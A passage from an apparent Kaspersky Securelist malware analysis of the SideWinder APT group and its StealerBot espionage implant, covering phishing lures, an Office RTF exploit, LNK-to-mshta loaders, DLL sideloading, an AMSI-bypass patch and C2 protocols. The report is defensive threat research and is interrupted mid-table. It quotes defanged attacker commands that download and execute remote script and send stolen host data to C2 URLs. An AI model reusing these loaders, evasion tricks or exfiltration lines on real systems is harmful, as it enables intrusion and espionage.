activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=9699678731355;npa=0;auiddc=490918692.1727437526;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fannalarkina%2F;u6=;u7=10841208243244163531036754683244071973-GA1.1.2119376506.1727437Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=9734739924889;npa=0;auiddc=1898206813.1727437529;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fflavionegrini%2F;u6=;u7=12626006958089755621434918844532291541-GA1.1.709230129.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=976651376818;npa=0;auiddc=1908927449.1727437460;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fksb-2023%2F;u6=;u7=39673012740457053282889438079958865763-GA1.1.765245434.1727437459;u9=_ksb-2Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=9925530821589;npa=0;auiddc=1535337916.1727437513;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fincidents%2F;u6=;u7=77187078455778277632376488003237749208-GA1.1.1226772492.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=9939137907211;npa=0;auiddc=1179866718.1727437481;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fabdulrhmanalfaifi%2F;u6=;u7=52483067802482707832004150018571855908-GA1.1.2046048419.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
IDEUsed by Google DoubleClick to register and report the website user's
actions after viewing or clicking one of the advertiser's ads with the
purpose of measuring the efficacy of an ad and to present targeted ads to
the user.
Maximum Storage Duration: 400 daysType: HTTP Cookie
receive-cookie-deprecationCollects information on user behaviour on
multiple websites. This information is used in order to optimize the
relevance of advertisement on the website.
Maximum Storage Duration: 180 daysType: HTTP Cookie
NIDRegisters a unique ID that identifies a returning user's device. The ID
is used for targeted ads.
Maximum Storage Duration: 6 monthsType: HTTP Cookie
pagead/1p-conversion/#/Pending
Maximum Storage Duration: SessionType: Pixel Tracker
_gcl_au [x2]Used by Google AdSense for experimenting with advertisement
efficiency across websites using their services.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
AwinChannelCookie [x2]Pending
Maximum Storage Duration: SessionType: HTTP Cookie
* Marketo
3
Learn more about this provider
__cf_bmThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of
their website.
Maximum Storage Duration: 1 dayType: HTTP Cookie
BIGipServer#Used to distribute traffic to the website on several servers
in order to optimise response times.
Maximum Storage Duration: SessionType: HTTP Cookie
_mkto_trkContains data on visitor behaviour and website interaction. This
is used in context with the email marketing service Marketo.com, which
allows the website to target visitors via email.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
* Twitter Inc.
1
Learn more about this provider
i/jot/embedsSets a unique ID for the visitor, that allows third party
advertisers to target the visitor with relevant advertisement. This
pairing service is provided by third party advertisement hubs, which
facilitates real-time bidding for advertisers.
Maximum Storage Duration: SessionType: Pixel Tracker
* YouTube
22
Learn more about this provider
#-#Used to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTML Local Storage
4dc5da7-d0d45fPending
Maximum Storage Duration: SessionType: HTML Local Storage
iU5q-!O9@$Registers a unique ID to keep statistics of what videos from
YouTube the user has seen.
Maximum Storage Duration: SessionType: HTML Local Storage
LAST_RESULT_ENTRY_KEYUsed to track user’s interaction with embedded
content.
Maximum Storage Duration: SessionType: HTTP Cookie
LogsDatabaseV2:V#||LogsRequestsStoreUsed to track user’s interaction with
embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
nextIdUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
remote_sidNecessary for the implementation and functionality of YouTube
video-content on the website.
Maximum Storage Duration: SessionType: HTTP Cookie
requestsUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
ServiceWorkerLogsDatabase#SWHealthLogNecessary for the implementation and
functionality of YouTube video-content on the website.
Maximum Storage Duration: PersistentType: IndexedDB
TESTCOOKIESENABLEDUsed to track user’s interaction with embedded content.
Maximum Storage Duration: 1 dayType: HTTP Cookie
VISITOR_INFO1_LIVETries to estimate the users' bandwidth on pages with
integrated YouTube videos.
Maximum Storage Duration: 180 daysType: HTTP Cookie
YSCRegisters a unique ID to keep statistics of what videos from YouTube
the user has seen.
Maximum Storage Duration: SessionType: HTTP Cookie
yt.innertube::nextIdRegisters a unique ID to keep statistics of what
videos from YouTube the user has seen.
Maximum Storage Duration: PersistentType: HTML Local Storage
ytidb::LAST_RESULT_ENTRY_KEYStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
YtIdbMeta#databasesUsed to track user’s interaction with embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
yt-remote-cast-availableStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-cast-installedStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-connected-devicesStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-device-idStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
yt-remote-fast-check-periodStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-appStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
yt-remote-session-nameStores the user's video player preferences using
embedded YouTube video
Maximum Storage Duration: SessionType: HTML Local Storage
* Unclassified 0
Unclassified cookies are cookies that we are in the process of classifying,
together with the providers of individual cookies.
We do not use cookies of this type.
Cross-domain consent2 Your consent applies to the following domains:
List of domains your consent applies to: securelist.lat securelist.com
Cookie declaration last updated on 2024-09-27 by Cookiebot
[#IABV2_TITLE#]
[#IABV2_BODY_INTRO#]
[#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#]
[#IABV2_BODY_PREFERENCE_INTRO#]
[#IABV2_LABEL_PURPOSES#]
[#IABV2_BODY_PURPOSES_INTRO#]
[#IABV2_BODY_PURPOSES#]
[#IABV2_LABEL_FEATURES#]
[#IABV2_BODY_FEATURES_INTRO#]
[#IABV2_BODY_FEATURES#]
[#IABV2_LABEL_PARTNERS#]
[#IABV2_BODY_PARTNERS_INTRO#]
[#IABV2_BODY_PARTNERS#]
Cookies are small text files that can be used by websites to make a user's
experience more efficient.
The law states that we can store cookies on your device if they are strictly
necessary for the operation of this site. For all other types of cookies we need
your permission.
This site uses different types of cookies. Some cookies are placed by third
party services that appear on our pages.
You can at any time change or withdraw your consent from the Cookie Declaration
on our website.
Learn more about who we are, how you can contact us and how we process personal
data in our Privacy Policy.
Please state your consent ID and date when you contact us regarding your
consent.
Do not sell or share my personal information
Use necessary cookies only Allow selection Customize
Allow all cookies
Solutions for:
* Home Products
* Small Business 1-50 employees
* Medium Business 51-999 employees
* Enterprise 1000+ employees
by Kaspersky
* CompanyAccount
* Get In Touch
* Dark mode off
* English
* Russian
* Spanish
* Solutions
* * Internet of Things & Embedded Security
Learn More
* Industrial Cybersecurity
Learn More
* Fraud Prevention
Learn More
* KasperskyOS-based solutions
Learn More
* * OTHER SOLUTIONS
* Kaspersky for Security Operations Center
* Kaspersky IoT Infrastructure Security
* Kaspersky Secure Remote Workspace
* Industries
* * National Cybersecurity
Learn More
* Industrial Cybersecurity
Learn More
* Finance Services Cybersecurity
Learn More
* Healthcare Cybersecurity
Learn More
* Transportation Cybersecurity
Learn More
* Retail Cybersecurity
Learn More
* * OTHER INDUSTRIES
* Telecom Cybersecurity
* View all
* Products
* * Kaspersky Next NEW!
Learn More
* KasperskyXDR
Learn More
* KasperskyEndpoint Security for Business
Learn More
* KasperskyEDR Expert
Learn More
* KasperskyEDR Optimum
Learn More
* KasperskyAnti Targeted Attack Platform
Learn More
* KasperskyHybrid Cloud Security
Learn More
* KasperskySD-WAN
Learn More
* KasperskyIndustrial CyberSecurity
Learn More
* KasperskyContainer Security
Learn More
* * OTHER PRODUCTS
* Kaspersky Security for Internet Gateway
* Kaspersky Embedded Systems Security
* Kaspersky IoT Infrastructure Security
* Kaspersky Secure Remote Workspace
* Kaspersky Security for Mail Server
* View All
* Services
* * KasperskyCybersecurity Services
Learn More
* KasperskySecurity Awareness
Learn More
* KasperskyPremium Support
Learn More
* KasperskyThreat Intelligence
Learn More
* KasperskyManaged Detection and Response
Learn More
* KasperskyCompromise Assessment
Learn More
* KasperskySOC Consulting
Learn More
* * OTHER SERVICES
* Kaspersky Professional Services
* Kaspersky Incident Response
* Kaspersky Cybersecurity Training
* Kaspersky Incident Communications
* Kaspersky Adaptive Online Training
* View All
* Resource Center
* Case Studies
* White Papers
* Datasheets
* Technologies
* MITRE ATT&CK
* About Us
* Transparency
* Corporate News
* Press Center
* Careers
* Innovation Hub
* Sponsorship
* Policy Blog
* Contacts
* GDPR
* Subscribe Dark mode off Login
* Securelist menu
* English
* Russian
* Spanish
* Existing Customers
* Personal
* My Kaspersky
* Renew your product
* Update your product
* Customer support
* Business
* KSOS portal
* Kaspersky Business Hub
* Technical Support
* Knowledge Base
* Renew License
* Home
* Products
* Trials&Update
* Resource Center
* Business
* Kaspersky Next
* Small Business (1-50 employees)
* Medium Business (51-999 employees)
* Enterprise (1000+ employees)
*
* Securelist
* Threats
* Financial threats
* Mobile threats
* Web threats
* Secure environment (IoT)
* Vulnerabilities and exploits
* Spam and Phishing
* Industrial threats
* Categories
* APT reports
* Incidents
* Research
* Malware reports
* Spam and phishing reports
* Publications
* Kaspersky Security Bulletin
* Archive
* All Tags
* APT Logbook
* Webinars
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2021
*
* About Us
* Company
* Transparency
* Corporate News
* Press Center
* Careers
* Sponsorships
* Policy Blog
* Contacts
* Partners
* Find a Partner
* Partner Program
Content menu Close
Subscribe
by Kaspersky
Dark mode off
Threats
Threats
* APT (Targeted attacks)
* Secure environment (IoT)
* Mobile threats
* Financial threats
* Spam and phishing
* Industrial threats
* Web threats
* Vulnerabilities and exploits
* All threats
Categories
Categories
* APT reports
* Malware descriptions
* Security Bulletin
* Malware reports
* Spam and phishing reports
* Security technologies
* Research
* Publications
* All categories
Other sections
* Archive
* All tags
* Webinars
* APT Logbook
* Statistics
* Encyclopedia
* Threats descriptions
* KSB 2023
APT reports
BEYOND THE SURFACE: THE EVOLUTION AND EXPANSION OF THE SIDEWINDER APT GROUP
APT reports
15 Oct 2024
27 minute read
Table of Contents
* Infection vectors
* RTF exploit
* Initial infection LNK
* Downloader module
* ModuleInstaller
* Backdoor loader module
* StealerBot
* StealerBot Orchestrator
* Modules
* Keylogger
* Screenshot Grabber
* File Stealer
* Live Console
* RDP Credential Stealer
* Token Grabber
* Credential Phisher
* UACBypass
* Downloader
* Installers
* InstallerPayload
* InstallerPayload_NET
* Infrastructure
* Victims
* Attribution
* IOCs
* Malicious documents
* Rtf
* Lnk
* Backdoor Loader
* StealerBot
* SyncBotServiceHijack.dll
* Service Hijack
* Backdoor Loader devobj.dll
* Domains and IPs
Authors
* Giampaolo Dedola
* Vasily Berdnikov
SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups
that began its activities in 2012 and was first publicly mentioned by us in
2018. Over the years, the group has launched attacks against high-profile
entities in South and Southeast Asia. Its primary targets have been military and
government entities in Pakistan, Sri Lanka, China and Nepal.
Over the years, SideWinder has carried out an impressive number of attacks and
its activities have been extensively described in various analyses and reports
published by different researchers and vendors (for example, here, here and
here), one of the latest of which was released at the end of July 2024. The
group may be perceived as a low-skilled actor due to the use of public exploits,
malicious LNK files and scripts as infection vectors, and the use of public
RATs, but their true capabilities only become apparent when you carefully
examine the details of their operations.
Despite years of observation and study, knowledge of their post-compromise
activities remains limited.
During our investigation, we observed new waves of attacks that showed a
significant expansion of the group’s activities. The attacks began to impact
high-profile entities and strategic infrastructures in the Middle East and
Africa, and we also discovered a previously unknown post-exploitation toolkit
called “StealerBot”, an advanced modular implant designed specifically for
espionage activities that we currently believe is the main post-exploitation
tool used by SideWinder on targets of interest.
SideWinder’s most recent campaign schema
INFECTION VECTORS
The SideWinder attack chain typically starts with a spear-phishing email with an
attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive,
which in turn contains a malicious LNK file. The document or LNK file starts a
multi-stage infection chain with various JavaScript and .NET downloaders, which
ends with the installation of the StealerBot espionage tool.
The documents often contain information obtained from public websites, which is
used to lure the victim into opening the file and believing it to be legitimate.
For example, the file in the image contains data downloaded from the following
URL:
https://nasc.org.np/news/closing-ceremony-training-program-financial-management-and-audit-officials-nepal-oil
Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation
(NOC).docx”
The contents of the file are selected specifically for the target and changed
depending on the target’s country.
All the documents use the remote template injection technique to download an RTF
file that is stored on a remote server controlled by the attacker.
RTF EXPLOIT
RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a
memory corruption vulnerability in Microsoft Office software.
The attacker embedded shellcode designed to execute JavaScript code using the
“RunHTMLApplication” function available in the “mshtml.dll” Windows library.
The shellcode uses different tricks to avoid sandboxes and complicate analysis.
* It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size
is less than 2GB, it terminates execution.
* It uses the CPUID instruction to obtain information about the processor
manufacturer. If the CPU is not from Intel or AMD, it terminates execution.
* It attempts to load the “dotnetlogger32.dll” library. If the file is present
on the system, it terminates execution.
The malware uses different strings to load libraries and functions required for
execution. These strings are truncated and the missing part is added at runtime
by patching the bytes. The strings are also mixed inside the code, which is
adapted to skip them and jump to valid instructions during execution, to make
analysis more difficult.
The strings are passed as arguments to a function that performs the same action
as “GetProcAddress”: it gets the address of an exported function. To do this, it
receives two arguments: a base address of a library that exports the function,
and the name of the exported function.
The first argument is passed with the standard push instruction, which loads the
library address to the stack. The second argument is passed indirectly using a
CALL instruction.
Passing necessary arguments
The loaded functions are then used to perform the following actions:
1. Load the “mshtml.dll” library and get the pointer to the
“RunHTMLApplication” function.
2. Get a pointer to the current command line using the “GetCommandLineW”
function.
3. Decrypt a script written in JavaScript that is embedded in the shellcode and
encoded with XOR using “0x12” as the key.
4. Overwrite the current process command line with the decoded JavaScript.
5. Call the “RunHTMLApplication” function, which will execute the code
specified in the process command line.
The loaded JavaScript downloads and executes additional script code from a
remote website.
javascript:eval("v=ActiveXObject;x=new
v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\", \"hxxps://mofa-gov-
sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")
1
2
3
javascript:eval("v=ActiveXObject;x=new
v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\",
\"hxxps://mofa-gov-
sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")
INITIAL INFECTION LNK
During the investigation we also observed another infection vector delivered via
a spear-phishing email with a ZIP file attached. The ZIP archive is distributed
with names intended to trick the victim into opening the file. The attacker
frequently uses names that refer to important events such as the Hajj, the
annual Islamic pilgrimage to Mecca.
The archive usually contains an LNK file with the same name as the archive. For
example:
ZIP filename LNK filename moavineen-e-hujjaj hajj-2024.zip MOAVINEEN-E-HUJJAJ
HAJJ-2024.docx.lnk NIMA Invitation.zip NIMA Invitation.doc.lnk Special Envoy
Speech at NCA.zip Special Envoy Speech at NCA.jpg .lnk දින සංශෝධන කර ගැනිම.zip
(Amending dates) දින සංශෝධන කර ගැනිම .lnk offer letter.zip offer letter.docx.lnk
The LNK file points to the “mshta.exe” utility, which is used to execute
JavaScript code hosted on a malicious website controlled by the attacker.
Below are the configuration values extracted from one of these LNK files:
Local Base Path : C:\Windows\System32\sshtw.png Description : MOAVINEEN-E-HUJJAJ
HAJJ-2024.docx Relative Path : ..\..\..\Windows\System32\calca.exe Link Target:
C:\Windows\System32\mshta.exe Working Directory : C:\Windows\System32 Command
Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0" Icon
File Name : %systemroot%\System32\moricons.dll Machine ID : desktop-84bs21b
1
2
3
4
5
6
7
8
Local Base Path : C:\Windows\System32\sshtw.png
Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx
Relative Path : ..\..\..\Windows\System32\calca.exe
Link Target: C:\Windows\System32\mshta.exe
Working Directory : C:\Windows\System32
Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"
Icon File Name : %systemroot%\System32\moricons.dll
Machine ID : desktop-84bs21b
DOWNLOADER MODULE
The RTF exploits and LNK files execute the same JavaScript malware. This script
decodes an embedded payload that is stored as a base64-encoded string. The
payload is a .NET library named “App.dll”, which is then invoked by the script.
JavaScript loader (beautified)
App.dll is a simple downloader or dropper configured to retrieve another .NET
payload from a remote URL passed as an argument by the JavaScript, or to decode
and execute another payload passed as an argument.
The library should be executed by invoking the “Programs.Work()” method, which
can receive three arguments as input. We named the inputs as follows:
Argument Argument description C2_URL An optional argument that can be used to
pass a URL used to download a remote payload. Payload_filename An optional
argument that can be used together with the “Payload_Data” argument to create a
file on the local filesystem that will contain the dropped payload. Payload_data
An optional argument that can be used to pass an encoded payload that should be
dropped on the local filesystem.
App.dll starts by collecting information about installed endpoint security
products. In particular, Avast and AVG solutions are of interest to the malware.
The collected data are sent to the C2. Then, if the “Payload_data” argument is
not “Null”, it decodes and decompresses the data using base64 and Gzip. The
resulting payload is stored in the user’s Temp directory using the filename
specified in the “Payload_filename” argument.
If Avast or AVG solutions are installed, the content of the dropped file is
executed with the following command:
mshta.exe "javascript:WshShell = new
ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1,
false);window.close()
1
2
3
mshta.exe "javascript:WshShell = new
ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1,
false);window.close()
Otherwise, it will be executed with the following command:
pcalua.exe -a %TEMP%\%Payload_filename%
1
pcalua.exe -a %TEMP%\%Payload_filename%
If the attacker provides a C2_URL, the malware attempts to download another
payload from the specified remote URL. The obtained data is decoded with an XOR
algorithm using the first 32 bytes of the received payload as the key.
The resulting file should be .NET malware named “ModuleInstaller.dll”.
MODULEINSTALLER
The ModuleInstaller malware is a downloader used to deploy the Trojan used to
maintain a foothold on compromised machines, a malicious component we dubbed
“Backdoor loader module”. We have been observing this specific component since
2020, but previously we only described it in our private intelligence reports.
ModuleInstaller was designed to drop at least four files: a legitimate and
signed application used to sideload a malicious library, a .config manifest
embedded in the program as a resource and required by the next stage to properly
load additional modules, a malicious library, and an encrypted payload. We
observed various combinations of the dropped files, the most common being:
%Malware Directory%\vssvc.exe %Malware Directory%\%encryptedfile% %Malware
Directory%\vsstrace.dll %Malware Directory%\vssvc.exe.config
1
2
3
4
5
6
7
%Malware Directory%\vssvc.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\vsstrace.dll
%Malware Directory%\vssvc.exe.config
or
%Malware Directory%\WorkFolders.exe %Malware Directory%\%encryptedfile% %Malware
Directory%\propsys.dll %Malware Directory%\WorkFolders.exe.config
1
2
3
4
5
6
7
%Malware Directory%\WorkFolders.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\propsys.dll
%Malware Directory%\WorkFolders.exe.config
ModuleInstaller embeds the following resources:
Resource name MD5 Description Interop_TaskScheduler_x64
95a49406abce52a25f0761f92166c18a Interop.TaskScheduler.dll for 64-bit systems
used to create Windows Scheduled Tasks Interop_TaskScheduler_x86
dfe750747517747afa2cee76f2a0f8e4 Interop.TaskScheduler.dll for 32-bit systems
used to create Windows Scheduled Tasks manifest d3136d7151f60ec41a370f4743c2983b
XML manifest dropped as .config file PeLauncher 22e3a5970ae84c5f68b98f3b19dd980b
.NET program not used in the code shellcode 32fc462f80b44013caeada725db5a2d1
Shellcode used to load libraries, which exports a function named “Start”
StealerBot_CppInstaller a107f27e7e9bac7c38e7778d661b78ac C++ library used to
download two malicious libraries and create persistence points
The downloader is configured to receive a URL as input and parse it to extract a
specific value from a variable. The retrieved value is then compared with a list
of string values that appear to be substrings of well-known endpoint security
solutions:
Pattern Endpoint Security Solution q=apn Unknown aspers Kaspersky Afree McAfee
(misspelled) avast Avast avg AVG orton Norton 360 360 Total Security avir Avira
ModuleInstaller supports six infection routines, which differ in the techniques
used to execute “Backdoor loader module” or download the components, but share
similarities in the main logic. Some of these routines also include tricks to
remove evidence, while others don’t. The malware only runs one specific routine
chosen according to the value received as an argument and the value of an
internal configuration embedded in the code.
Routine Conditions Infection Routine 1 Executed when substring “q=apn” is
detected. Infection Routine 2 Executed when a specific byte of the internal
config is equal to “1”. Infection Routine 3 Executed when the substring “360” is
detected. Infection Routine 4 Executed when the substring “avast” or “avir” is
detected. Infection Routine 5 Executed when the substring “aspers” or “Afree” is
detected Infection Routine 6 Default case. Executed when all the other
conditions are not satisfied.
All the routines collect information about the compromised system. Specifically,
they collect:
* Current username;
* Processor names and number of cores;
* Physical disk name and size;
* The values of the TotalVirtualMemorySize and TotalVisibleMemorySize
properties;
* Current hostname;
* Local IP address;
* Installed OS;
* Architecture.
The collected data are then encoded in base64 and concatenated with a C2 URL
embedded in the code, inside a variable named “data”.
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo>
1
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo>
The malware has several C2 URLs embedded in the code, all of them encoded with
base64 using a custom alphabet:
C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download C2_URL_2 =
hxxps://dynamic.nactagovpk[.]org/0df7b2_download C2_URL_3 =
hxxps://dynamic.nactagovpk[.]org/27419a_download C2_URL_4 =
hxxps://dynamic.nactagovpk[.]org/ef1c4f_download
1
2
3
4
C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download
C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download
C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download
C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download
The malware sends the collected information to one of the C2 servers selected
according to the specific infection routine. The server response should be a
payload with various configuration values.
The set of values may vary depending on the infection routine. The malware
parses the received values and assigns them to local variables. In most cases
the variable names cannot be obtained from the malware code. However, in one
particular infection routine the attacker used debug strings that allowed us to
obtain most of these names. The table below contains the full list of possible
configuration values.
Variable name Description MALWARE_DIRECTORY Directory path where all the
malicious files are stored. LOAD_DLL_URL_X64 URL used to download the malicious
library for 64-bit systems. LOAD_DLL_URL_X86 URL used to download the malicious
library for 32-bit systems. LOAD_DLL_URL URL used to download the malicious
library. Some infection routines do not check the architecture. APP_DLL_URL URL
used to download the encrypted payload. HIJACK_EXE_URL URL used to download the
legitimate application used to sideload the malicious library. RUN_KEY Name of
the Windows Registry value that will be created to maintain persistence.
HIJACK_EXE_NAME Name of the legitimate application. LOAD_DLL_NAME Name of the
malicious library. MOD_LOAD_DLL_URL URL used to download an unknown library that
is saved in the MALWARE_DIRECTORY as “IPHelper.dll”.
The payload is XORed twice. The keys are the first 32 bytes at the beginning of
the payload.
During execution, the malware logs the current infection status by sending GET
requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The
request includes at least one variable named “data”, whose value indicates the
infection status.
Variable Description ?data=1 Downloads completed. ?data=2 Persistence point
created. ?data=3&m=str Error. It also contains a variable “m” with information
about the error. ?data=4 Infection completed, but the next stage is not running.
?data=5 Infection completed and the next stage is running.
The technique used to maintain persistence varies according to the infection
routine selected by the malware, but generally relies on the creation of new
registry values under the HKCU Run key or the creation of Windows Scheduled
Tasks.
For example:
RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RegValue: xcschemer
(MALWARE_DIRECTORY) RegValueData: %AppData%\xcschemer\vssvc.exe
(HIJACK_EXE_PATH)
1
2
3
RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegValue: xcschemer (MALWARE_DIRECTORY)
RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)
BACKDOOR LOADER MODULE
The infection scheme described in the previous paragraph results in the
installation of a malicious library that is sideloaded using the legitimate and
digitally signed application. The library acts as a loader that retrieves an
encrypted payload dropped by ModuleInstaller, decrypts it and loads it in
memory.
The Backdoor loader module has been observed since 2020, we covered it in our
private APT reports. It has remained almost the same over the years. It was
recently updated by the attacker, but the main difference is that old variants
are configured to load the encrypted file using a specific filename embedded in
the program, and the latest variants were designed to enumerate all the files in
the current directory and load those without an extension.
The library is usually highly obfuscated using the Control Flow Flattening
technique. In addition, the strings, method names, and resource names are
randomly modified with long strings, which makes the decoded code difficult to
analyze. Moreover, some relevant strings are stored inside a resource embedded
in the program and encrypted with an XOR layer and Triple DES.
The malware also contains anti-sandbox techniques. It takes the current date and
time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the
sleeping functions because they are often used by malware to generate long
delays in execution and avoid detection. Upon awakening, the malware retrieves
again the current time and date and checks if the elapsed time is less than 90.5
seconds. If the condition is true, it terminates the execution.
The malware also attempts to avoid detection by patching the AmsiScanBuffer
function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it
loads the “amsi.dll” library and parses the export directory to find the
“AmsiScanBuffer” function. In this function, it changes the memory protection
flags to modify instructions at RVA 0x337D to always return error code
0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi”
protection to always return a scan result equal to 0, which is usually
interpreted as AMSI_RESULT_CLEAN.
AmsiScanBuffer before patching
AmsiScanBuffer after patching
The patched code is only one byte in size: the malware changes 0x74, which
corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to
JNZ (Jump if not zero). The jump should be made when the buffer provided as
input to the AmsiScanBuffer function is invalid. With the modification, the jump
will be made for all valid buffers.
After patching AmsiScanBuffer, the malware performs a startup operation to
achieve its main goal, which is to load another payload from the encrypted file.
First, it enumerates files in the current directory and tries to find a file
without the character ‘.’ in the file name (i.e., without an extension). Then,
if the file is found, it uses the first 16 bytes at the beginning of the file as
the key and decodes the rest of the data using the XOR algorithm. Finally, it
loads the data as a .NET assembly and invokes the “Program.ctor” method.
STEALERBOT
StealerBot is a name assigned by the attacker to a modular implant developed
with .NET to perform espionage activities. We never observed any of the implant
components on the filesystem. They are loaded into memory by the Backdoor loader
module. Prior to being loaded, the binary is stored in an encrypted file.
The implant consists of different modules loaded by the main “Orchestrator”,
which is responsible for communicating with the C2 and executing and managing
the plugins. During the investigation, we discovered several plugins that were
uploaded on compromised victims and were used to:
* Install additional malware;
* Capture screenshots;
* Log keystrokes;
* Steal passwords from browsers;
* Intercept RDP credentials;
* Steal files;
* Start reverse shell;
* Phish Windows credentials;
* Escalate privileges bypassing UAC.
Module IDs are included both in modules and in an encrypted configuration file.
The Orchestrator uses them to manage the components. It shares messages/commands
with the modules, and can handle specific messages to kill or remove modules
with a particular ID.
Module ID Description 0xca Keylogger 0xcb Live Console 0xd0 Screenshot Grabber
0xd4 File Stealer 0xd6 UACBypass 0xe0 RDP Credential Stealer 0xe1 Token Grabber
?? Credential Phisher
STEALERBOT ORCHESTRATOR
The Orchestrator is usually loaded by the Backdoor loader module and is
responsible for communicating with the C2 server, and executing and managing
plugins. It periodically connects to two URLs to download modules provided by
the attacker and upload files with stolen information. It also exchanges
messages with the loaded module that can be used to provide or modify
configuration properties and unload specific components from the memory.
Once loaded into memory, the malware decodes a resource embedded in the
Orchestrator called “Default”. The resource contains a configuration file with
the following structure:
Parameter Parameter type Description Config path String Location used to store
the configuration file after first execution Data directory String Directory
where the plugins store the output files that will be uploaded to the remote C2
C2 Modules String URL used to communicate with C2 server and retrieve additional
plugins C2 Gateway String URL used to upload files generated by modules C2
Modules Sleeptime Integer Sleep time between communications with “C2 Modules” C2
Gateway Sleeptime Integer Sleep time between communications with “C2 Gateway”
RSA_Key String RSA key used to encrypt communication with the C2 server Number
of plugins Integer Number of plugins embedded in the configuration Modules Array
Array which contains the modules
The configuration can embed multiple modules. By default, the array is usually
empty, but after initial execution, the malware creates a copy of the
configuration in a local file and keeps it updated with information retrieved
from the C2 server.
After parsing the configuration, the malware loads all the modules specified in
the file. It then launches two threads to communicate with the remote C2 server.
The first thread is used to communicate with the first URL that we dubbed “C2
Modules”, which is used to obtain new modules. The second thread is used to
communicate with the URL we called “C2 Gateway”, which is used to upload the
data generated by the modules.
The malware communicates with the C2 Modules server using GET requests. Before
sending the request, it adds an “x” value that contains the list of modules
already loaded by the agent.
&x[moduleId_1,moduleId_2,moduleId_3,etc.]"
1
&x[moduleId_1,moduleId_2,moduleId_3,etc.]"
The server responds with a message composed of two parts, the header and the
payload. Each part has a specific structure with different information:
Message structure
Each message is digitally signed with the RSA private key owned by the
server-side attacker, and the signature is stored in the “rgbSignature” value.
The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify
that the provided digital signature is valid.
The header is encoded with the same XOR algorithm used to encode or decode the
configuration file. The payload is compressed using Gzip and encrypted using
AES. The header contains the information needed to identify the module, decrypt
the payload, and verify the received data.
When the module is loaded, the Orchestrator invokes the module main method,
passing two arguments: the module ID and a pipe handle. The pipe is used to
maintain communication between the module and the Orchestrator.
The modules can send various messages to the Orchestrator to get or modify the
configuration, send log messages, and terminate module execution. The messages
function like commands, have a specific ID, and can include arguments.
The first byte of the message is its ID, which defines the request type:
Message ID Description 0 Get settings: the Orchestrator creates a copy of the
current configuration and sends it to the module. 1 Update config: the module
provides a new configuration and the Orchestrator updates the current
configuration values and stores them in the local file. 2 Unload current module:
the Orchestrator should unload the current module from the memory and close the
